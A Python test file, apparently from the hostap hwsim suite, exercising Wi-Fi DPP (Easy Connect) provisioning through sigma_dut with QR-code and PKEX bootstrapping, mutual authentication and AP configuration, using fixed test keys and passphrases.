def test_sigma_dut_dpp_qr_mutual_init_enrollee(dev, apdev):
"""sigma_dut DPP/QR (mutual) initiator as Enrollee"""
run_sigma_dut_dpp_qr_mutual_init_enrollee_check(dev, apdev)
def test_sigma_dut_dpp_qr_mutual_init_enrollee_check(dev, apdev):
"""sigma_dut DPP/QR (mutual) initiator as Enrollee (extra check)"""
run_sigma_dut_dpp_qr_mutual_init_enrollee_check(dev, apdev,
extra="DPPAuthDirection,Mutual,")
def run_sigma_dut_dpp_qr_mutual_init_enrollee_check(dev, apdev, extra=''):
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
csign = "30770201010420768240a3fc89d6662d9782f120527fe7fb9edc6366ab0b9c7dde96125cfd250fa00a06082a8648ce3d030107a144034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708"
csign_pub = "3059301306072a8648ce3d020106082a8648ce3d030107034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708"
ap_connector = "eyJ0eXAiOiJkcHBDb24iLCJraWQiOiJwYWtZbXVzd1dCdWpSYTl5OEsweDViaTVrT3VNT3dzZHRlaml2UG55ZHZzIiwiYWxnIjoiRVMyNTYifQ.eyJncm91cHMiOlt7Imdyb3VwSWQiOiIqIiwibmV0Um9sZSI6ImFwIn1dLCJuZXRBY2Nlc3NLZXkiOnsia3R5IjoiRUMiLCJjcnYiOiJQLTI1NiIsIngiOiIybU5vNXZuRkI5bEw3d1VWb1hJbGVPYzBNSEE1QXZKbnpwZXZULVVTYzVNIiwieSI6IlhzS3dqVHJlLTg5WWdpU3pKaG9CN1haeUttTU05OTl3V2ZaSVl0bi01Q3MifX0.XhjFpZgcSa7G2lHy0OCYTvaZFRo5Hyx6b7g7oYyusLC7C_73AJ4_BxEZQVYJXAtDuGvb3dXSkHEKxREP9Q6Qeg"
ap_netaccesskey = "30770201010420ceba752db2ad5200fa7bc565b9c05c69b7eb006751b0b329b0279de1c19ca67ca00a06082a8648ce3d030107a14403420004da6368e6f9c507d94bef0515a1722578e73430703902f267ce97af4fe51273935ec2b08d3adefbcf588224b3261a01ed76722a630cf7df7059f64862d9fee42b"
params = { "ssid": "DPPNET01",
"wpa": "2",
"ieee80211w": "2",
"wpa_key_mgmt": "DPP",
"rsn_pairwise": "CCMP",
"dpp_connector": ap_connector,
"dpp_csign": csign_pub,
"dpp_netaccesskey": ap_netaccesskey }
try:
hapd = hostapd.add_ap(apdev[0], params)
except:
raise HwsimSkip("DPP not supported")
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[0].set("dpp_config_processing", "2")
cmd = "DPP_CONFIGURATOR_ADD key=" + csign
res = dev[1].request(cmd);
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
addr = dev[1].own_addr().replace(':', '')
cmd = "DPP_BOOTSTRAP_GEN type=qrcode chan=81/6 mac=" + addr
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id0 = int(res)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
dev[1].set("dpp_configurator_params",
" conf=sta-dpp ssid=%s configurator=%d" % ("DPPNET01".encode("hex"), conf_id));
cmd = "DPP_LISTEN 2437 role=configurator qr=mutual"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR")
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
hex = res.split(',')[3]
uri = hex.decode('hex')
logger.info("URI from sigma_dut: " + uri)
res = dev[1].request("DPP_QR_CODE " + uri)
if "FAIL" in res:
raise Exception("Failed to parse QR Code URI")
id1 = int(res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % uri0.encode('hex'))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,%sDPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPWaitForConnect,Yes" % extra, timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def dpp_init_conf_mutual(dev, id1, conf_id, own_id=None):
time.sleep(1)
logger.info("Starting DPP initiator/configurator in a thread")
cmd = "DPP_AUTH_INIT peer=%d conf=sta-dpp ssid=%s configurator=%d" % (id1, "DPPNET01".encode("hex"), conf_id)
if own_id is not None:
cmd += " own=%d" % own_id
if "OK" not in dev.request(cmd):
raise Exception("Failed to initiate DPP Authentication")
ev = dev.wait_event(["DPP-CONF-SENT"], timeout=10)
if ev is None:
raise Exception("DPP configuration not completed (Configurator)")
logger.info("DPP initiator/configurator done")
def test_sigma_dut_dpp_qr_mutual_resp_enrollee(dev, apdev):
"""sigma_dut DPP/QR (mutual) responder as Enrollee"""
run_sigma_dut_dpp_qr_mutual_resp_enrollee(dev, apdev)
def test_sigma_dut_dpp_qr_mutual_resp_enrollee_pending(dev, apdev):
"""sigma_dut DPP/QR (mutual) responder as Enrollee (response pending)"""
run_sigma_dut_dpp_qr_mutual_resp_enrollee(dev, apdev, ',DPPDelayQRResponse,1')
def run_sigma_dut_dpp_qr_mutual_resp_enrollee(dev, apdev, extra=None):
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
csign = "30770201010420768240a3fc89d6662d9782f120527fe7fb9edc6366ab0b9c7dde96125cfd250fa00a06082a8648ce3d030107a144034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708"
csign_pub = "3059301306072a8648ce3d020106082a8648ce3d030107034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708"
ap_connector = "eyJ0eXAiOiJkcHBDb24iLCJraWQiOiJwYWtZbXVzd1dCdWpSYTl5OEsweDViaTVrT3VNT3dzZHRlaml2UG55ZHZzIiwiYWxnIjoiRVMyNTYifQ.eyJncm91cHMiOlt7Imdyb3VwSWQiOiIqIiwibmV0Um9sZSI6ImFwIn1dLCJuZXRBY2Nlc3NLZXkiOnsia3R5IjoiRUMiLCJjcnYiOiJQLTI1NiIsIngiOiIybU5vNXZuRkI5bEw3d1VWb1hJbGVPYzBNSEE1QXZKbnpwZXZULVVTYzVNIiwieSI6IlhzS3dqVHJlLTg5WWdpU3pKaG9CN1haeUttTU05OTl3V2ZaSVl0bi01Q3MifX0.XhjFpZgcSa7G2lHy0OCYTvaZFRo5Hyx6b7g7oYyusLC7C_73AJ4_BxEZQVYJXAtDuGvb3dXSkHEKxREP9Q6Qeg"
ap_netaccesskey = "30770201010420ceba752db2ad5200fa7bc565b9c05c69b7eb006751b0b329b0279de1c19ca67ca00a06082a8648ce3d030107a14403420004da6368e6f9c507d94bef0515a1722578e73430703902f267ce97af4fe51273935ec2b08d3adefbcf588224b3261a01ed76722a630cf7df7059f64862d9fee42b"
params = { "ssid": "DPPNET01",
"wpa": "2",
"ieee80211w": "2",
"wpa_key_mgmt": "DPP",
"rsn_pairwise": "CCMP",
"dpp_connector": ap_connector,
"dpp_csign": csign_pub,
"dpp_netaccesskey": ap_netaccesskey }
try:
hapd = hostapd.add_ap(apdev[0], params)
except:
raise HwsimSkip("DPP not supported")
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[0].set("dpp_config_processing", "2")
cmd = "DPP_CONFIGURATOR_ADD key=" + csign
res = dev[1].request(cmd);
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
addr = dev[1].own_addr().replace(':', '')
cmd = "DPP_BOOTSTRAP_GEN type=qrcode chan=81/6 mac=" + addr
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id0 = int(res)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR")
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
hex = res.split(',')[3]
uri = hex.decode('hex')
logger.info("URI from sigma_dut: " + uri)
res = dev[1].request("DPP_QR_CODE " + uri)
if "FAIL" in res:
raise Exception("Failed to parse QR Code URI")
id1 = int(res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % uri0.encode('hex'))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
t = threading.Thread(target=dpp_init_conf_mutual,
args=(dev[1], id1, conf_id, id0))
t.start()
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Mutual,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,20,DPPWaitForConnect,Yes"
if extra:
cmd += extra
res = sigma_dut_cmd(cmd, timeout=25)
t.join()
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def dpp_resp_conf_mutual(dev, conf_id, uri):
logger.info("Starting DPP responder/configurator in a thread")
dev.set("dpp_configurator_params",
" conf=sta-dpp ssid=%s configurator=%d" % ("DPPNET01".encode("hex"), conf_id));
cmd = "DPP_LISTEN 2437 role=configurator qr=mutual"
if "OK" not in dev.request(cmd):
raise Exception("Failed to initiate DPP listen")
if uri:
ev = dev.wait_event(["DPP-SCAN-PEER-QR-CODE"], timeout=10)
if ev is None:
raise Exception("QR Code scan for mutual authentication not requested")
res = dev.request("DPP_QR_CODE " + uri)
if "FAIL" in res:
raise Exception("Failed to parse QR Code URI")
ev = dev.wait_event(["DPP-CONF-SENT"], timeout=10)
if ev is None:
raise Exception("DPP configuration not completed (Configurator)")
logger.info("DPP responder/configurator done")
def test_sigma_dut_dpp_qr_mutual_init_enrollee(dev, apdev):
"""sigma_dut DPP/QR (mutual) initiator as Enrollee"""
run_sigma_dut_dpp_qr_mutual_init_enrollee(dev, apdev, False)
def test_sigma_dut_dpp_qr_mutual_init_enrollee_pending(dev, apdev):
"""sigma_dut DPP/QR (mutual) initiator as Enrollee (response pending)"""
run_sigma_dut_dpp_qr_mutual_init_enrollee(dev, apdev, True)
def run_sigma_dut_dpp_qr_mutual_init_enrollee(dev, apdev, resp_pending):
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
csign = "30770201010420768240a3fc89d6662d9782f120527fe7fb9edc6366ab0b9c7dde96125cfd250fa00a06082a8648ce3d030107a144034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708"
csign_pub = "3059301306072a8648ce3d020106082a8648ce3d030107034200042908e1baf7bf413cc66f9e878a03e8bb1835ba94b033dbe3d6969fc8575d5eb5dfda1cb81c95cee21d0cd7d92ba30541ffa05cb6296f5dd808b0c1c2a83c0708"
ap_connector = "eyJ0eXAiOiJkcHBDb24iLCJraWQiOiJwYWtZbXVzd1dCdWpSYTl5OEsweDViaTVrT3VNT3dzZHRlaml2UG55ZHZzIiwiYWxnIjoiRVMyNTYifQ.eyJncm91cHMiOlt7Imdyb3VwSWQiOiIqIiwibmV0Um9sZSI6ImFwIn1dLCJuZXRBY2Nlc3NLZXkiOnsia3R5IjoiRUMiLCJjcnYiOiJQLTI1NiIsIngiOiIybU5vNXZuRkI5bEw3d1VWb1hJbGVPYzBNSEE1QXZKbnpwZXZULVVTYzVNIiwieSI6IlhzS3dqVHJlLTg5WWdpU3pKaG9CN1haeUttTU05OTl3V2ZaSVl0bi01Q3MifX0.XhjFpZgcSa7G2lHy0OCYTvaZFRo5Hyx6b7g7oYyusLC7C_73AJ4_BxEZQVYJXAtDuGvb3dXSkHEKxREP9Q6Qeg"
ap_netaccesskey = "30770201010420ceba752db2ad5200fa7bc565b9c05c69b7eb006751b0b329b0279de1c19ca67ca00a06082a8648ce3d030107a14403420004da6368e6f9c507d94bef0515a1722578e73430703902f267ce97af4fe51273935ec2b08d3adefbcf588224b3261a01ed76722a630cf7df7059f64862d9fee42b"
params = { "ssid": "DPPNET01",
"wpa": "2",
"ieee80211w": "2",
"wpa_key_mgmt": "DPP",
"rsn_pairwise": "CCMP",
"dpp_connector": ap_connector,
"dpp_csign": csign_pub,
"dpp_netaccesskey": ap_netaccesskey }
try:
hapd = hostapd.add_ap(apdev[0], params)
except:
raise HwsimSkip("DPP not supported")
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[0].set("dpp_config_processing", "2")
cmd = "DPP_CONFIGURATOR_ADD key=" + csign
res = dev[1].request(cmd);
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
addr = dev[1].own_addr().replace(':', '')
cmd = "DPP_BOOTSTRAP_GEN type=qrcode chan=81/6 mac=" + addr
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id0 = int(res)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR")
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
hex = res.split(',')[3]
uri = hex.decode('hex')
logger.info("URI from sigma_dut: " + uri)
if not resp_pending:
res = dev[1].request("DPP_QR_CODE " + uri)
if "FAIL" in res:
raise Exception("Failed to parse QR Code URI")
uri = None
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % uri0.encode('hex'))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
t = threading.Thread(target=dpp_resp_conf_mutual,
args=(dev[1], conf_id, uri))
t.start()
time.sleep(1)
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,10,DPPWaitForConnect,Yes"
res = sigma_dut_cmd(cmd, timeout=15)
t.join()
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkIntroResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_qr_init_enrollee_psk(dev, apdev):
"""sigma_dut DPP/QR initiator as Enrollee (PSK)"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
params = hostapd.wpa2_params(ssid="DPPNET01",
passphrase="ThisIsDppPassphrase")
hapd = hostapd.add_ap(apdev[0], params)
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[0].set("dpp_config_processing", "2")
cmd = "DPP_CONFIGURATOR_ADD"
res = dev[1].request(cmd);
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
addr = dev[1].own_addr().replace(':', '')
cmd = "DPP_BOOTSTRAP_GEN type=qrcode chan=81/6 mac=" + addr
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id0 = int(res)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
dev[1].set("dpp_configurator_params",
" conf=sta-psk ssid=%s pass=%s configurator=%d" % ("DPPNET01".encode("hex"), "ThisIsDppPassphrase".encode("hex"), conf_id));
cmd = "DPP_LISTEN 2437 role=configurator"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % uri0.encode('hex'))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPWaitForConnect,Yes", timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_qr_init_enrollee_sae(dev, apdev):
"""sigma_dut DPP/QR initiator as Enrollee (SAE)"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
if "SAE" not in dev[0].get_capability("auth_alg"):
raise HwsimSkip("SAE not supported")
params = hostapd.wpa2_params(ssid="DPPNET01",
passphrase="ThisIsDppPassphrase")
params['wpa_key_mgmt'] = 'SAE'
params["ieee80211w"] = "2"
hapd = hostapd.add_ap(apdev[0], params)
sigma = start_sigma_dut(dev[0].ifname)
try:
dev[0].set("dpp_config_processing", "2")
cmd = "DPP_CONFIGURATOR_ADD"
res = dev[1].request(cmd);
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
addr = dev[1].own_addr().replace(':', '')
cmd = "DPP_BOOTSTRAP_GEN type=qrcode chan=81/6 mac=" + addr
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id0 = int(res)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
dev[1].set("dpp_configurator_params",
" conf=sta-sae ssid=%s pass=%s configurator=%d" % ("DPPNET01".encode("hex"), "ThisIsDppPassphrase".encode("hex"), conf_id));
cmd = "DPP_LISTEN 2437 role=configurator"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % uri0.encode('hex'))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6,DPPWaitForConnect,Yes", timeout=10)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK,NetworkConnectResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
dev[0].set("dpp_config_processing", "0")
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_qr_init_configurator_1(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator (conf index 1)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 1)
def test_sigma_dut_dpp_qr_init_configurator_2(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator (conf index 2)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 2)
def test_sigma_dut_dpp_qr_init_configurator_3(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator (conf index 3)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 3)
def test_sigma_dut_dpp_qr_init_configurator_4(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator (conf index 4)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 4)
def test_sigma_dut_dpp_qr_init_configurator_5(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator (conf index 5)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 5)
def test_sigma_dut_dpp_qr_init_configurator_6(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator (conf index 6)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 6)
def test_sigma_dut_dpp_qr_init_configurator_7(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator (conf index 7)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 7)
def test_sigma_dut_dpp_qr_init_configurator_both(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator or Enrollee (conf index 1)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 1, "Both")
def test_sigma_dut_dpp_qr_init_configurator_neg_freq(dev, apdev):
"""sigma_dut DPP/QR initiator as Configurator (neg_freq)"""
run_sigma_dut_dpp_qr_init_configurator(dev, apdev, 1, extra='DPPSubsequentChannel,81/11')
def run_sigma_dut_dpp_qr_init_configurator(dev, apdev, conf_idx,
prov_role="Configurator",
extra=None):
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
sigma = start_sigma_dut(dev[0].ifname)
try:
addr = dev[1].own_addr().replace(':', '')
cmd = "DPP_BOOTSTRAP_GEN type=qrcode chan=81/6 mac=" + addr
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id0 = int(res)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
cmd = "DPP_LISTEN 2437 role=enrollee"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % uri0.encode('hex'))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Single,DPPProvisioningRole,%s,DPPConfIndex,%d,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,QR,DPPTimeout,6" % (prov_role, conf_idx)
if extra:
cmd += "," + extra
res = sigma_dut_cmd(cmd)
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_incompatible_roles_init(dev, apdev):
"""sigma_dut DPP roles incompatible (Initiator)"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
sigma = start_sigma_dut(dev[0].ifname)
try:
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR")
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
hex = res.split(',')[3]
uri = hex.decode('hex')
logger.info("URI from sigma_dut: " + uri)
res = dev[1].request("DPP_QR_CODE " + uri)
if "FAIL" in res:
raise Exception("Failed to parse QR Code URI")
id1 = int(res)
addr = dev[1].own_addr().replace(':', '')
cmd = "DPP_BOOTSTRAP_GEN type=qrcode chan=81/6 mac=" + addr
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id0 = int(res)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
cmd = "DPP_LISTEN 2437 role=enrollee"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % uri0.encode('hex'))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPAuthDirection,Mutual,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6"
res = sigma_dut_cmd(cmd)
if "BootstrapResult,OK,AuthResult,ROLES_NOT_COMPATIBLE" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
def dpp_init_enrollee_mutual(dev, id1, own_id):
logger.info("Starting DPP initiator/enrollee in a thread")
time.sleep(1)
cmd = "DPP_AUTH_INIT peer=%d own=%d role=enrollee" % (id1, own_id)
if "OK" not in dev.request(cmd):
raise Exception("Failed to initiate DPP Authentication")
ev = dev.wait_event(["DPP-CONF-RECEIVED",
"DPP-NOT-COMPATIBLE"], timeout=5)
if ev is None:
raise Exception("DPP configuration not completed (Enrollee)")
logger.info("DPP initiator/enrollee done")
def test_sigma_dut_dpp_incompatible_roles_resp(dev, apdev):
"""sigma_dut DPP roles incompatible (Responder)"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
sigma = start_sigma_dut(dev[0].ifname)
try:
cmd = "dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR"
res = sigma_dut_cmd(cmd)
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
hex = res.split(',')[3]
uri = hex.decode('hex')
logger.info("URI from sigma_dut: " + uri)
res = dev[1].request("DPP_QR_CODE " + uri)
if "FAIL" in res:
raise Exception("Failed to parse QR Code URI")
id1 = int(res)
addr = dev[1].own_addr().replace(':', '')
cmd = "DPP_BOOTSTRAP_GEN type=qrcode chan=81/6 mac=" + addr
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id0 = int(res)
uri0 = dev[1].request("DPP_BOOTSTRAP_GET_URI %d" % id0)
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,SetPeerBootstrap,DPPBootstrappingdata,%s,DPPBS,QR" % uri0.encode('hex'))
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
t = threading.Thread(target=dpp_init_enrollee_mutual, args=(dev[1], id1, id0))
t.start()
cmd = "dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Responder,DPPAuthDirection,Mutual,DPPProvisioningRole,Enrollee,DPPBS,QR,DPPTimeout,6"
res = sigma_dut_cmd(cmd, timeout=10)
t.join()
if "BootstrapResult,OK,AuthResult,ROLES_NOT_COMPATIBLE" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
def test_sigma_dut_dpp_pkex_init_configurator(dev, apdev):
"""sigma_dut DPP/PKEX initiator as Configurator"""
check_dpp_capab(dev[0])
check_dpp_capab(dev[1])
sigma = start_sigma_dut(dev[0].ifname)
try:
cmd = "DPP_BOOTSTRAP_GEN type=pkex"
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to generate bootstrapping info")
id1 = int(res)
cmd = "DPP_PKEX_ADD own=%d identifier=test code=secret" % (id1)
res = dev[1].request(cmd)
if "FAIL" in res:
raise Exception("Failed to set PKEX data (responder)")
cmd = "DPP_LISTEN 2437 role=enrollee"
if "OK" not in dev[1].request(cmd):
raise Exception("Failed to start listen operation")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,AutomaticDPP,DPPAuthRole,Initiator,DPPProvisioningRole,Configurator,DPPConfIndex,1,DPPSigningKeyECC,P-256,DPPConfEnrolleeRole,STA,DPPBS,PKEX,DPPPKEXCodeIdentifier,test,DPPPKEXCode,secret,DPPTimeout,6")
if "BootstrapResult,OK,AuthResult,OK,ConfResult,OK" not in res:
raise Exception("Unexpected result: " + res)
finally:
stop_sigma_dut(sigma)
def dpp_init_conf(dev, id1, conf, conf_id, extra):
logger.info("Starting DPP initiator/configurator in a thread")
cmd = "DPP_AUTH_INIT peer=%d conf=%s %s configurator=%d" % (id1, conf, extra, conf_id)
if "OK" not in dev.request(cmd):
raise Exception("Failed to initiate DPP Authentication")
ev = dev.wait_event(["DPP-CONF-SENT"], timeout=5)
if ev is None:
raise Exception("DPP configuration not completed (Configurator)")
logger.info("DPP initiator/configurator done")
def test_sigma_dut_ap_dpp_qr(dev, apdev, params):
"""sigma_dut controlled AP (DPP)"""
run_sigma_dut_ap_dpp_qr(dev, apdev, params, "ap-dpp", "sta-dpp")
def test_sigma_dut_ap_dpp_qr_legacy(dev, apdev, params):
"""sigma_dut controlled AP (legacy)"""
run_sigma_dut_ap_dpp_qr(dev, apdev, params, "ap-psk", "sta-psk",
extra="pass=%s" % "qwertyuiop".encode("hex"))
def test_sigma_dut_ap_dpp_qr_legacy_psk(dev, apdev, params):
"""sigma_dut controlled AP (legacy)"""
run_sigma_dut_ap_dpp_qr(dev, apdev, params, "ap-psk", "sta-psk",
extra="psk=%s" % (32*"12"))
def run_sigma_dut_ap_dpp_qr(dev, apdev, params, ap_conf, sta_conf, extra=""):
check_dpp_capab(dev[0])
logdir = os.path.join(params['logdir'], "sigma_dut_ap_dpp_qr.sigma-hostapd")
with HWSimRadio() as (radio, iface):
sigma = start_sigma_dut(iface, hostapd_logdir=logdir)
try:
sigma_dut_cmd_check("ap_reset_default,program,DPP")
res = sigma_dut_cmd("dev_exec_action,program,DPP,DPPActionType,GetLocalBootstrap,DPPCryptoIdentifier,P-256,DPPBS,QR")
if "status,COMPLETE" not in res:
raise Exception("dev_exec_action did not succeed: " + res)
hex = res.split(',')[3]
uri = hex.decode('hex')
logger.info("URI from sigma_dut: " + uri)
cmd = "DPP_CONFIGURATOR_ADD"
res = dev[0].request(cmd);
if "FAIL" in res:
raise Exception("Failed to add configurator")
conf_id = int(res)
res = dev[0].request("DPP_QR_CODE " + uri)
if "FAIL" in res:
raise Exception("Failed to parse QR Code URI")
id1 = int(res)
t = threading.Thread(target=dpp_init_conf,
args=(dev[0], id1, ap_conf, conf_id, extra))
t.start()
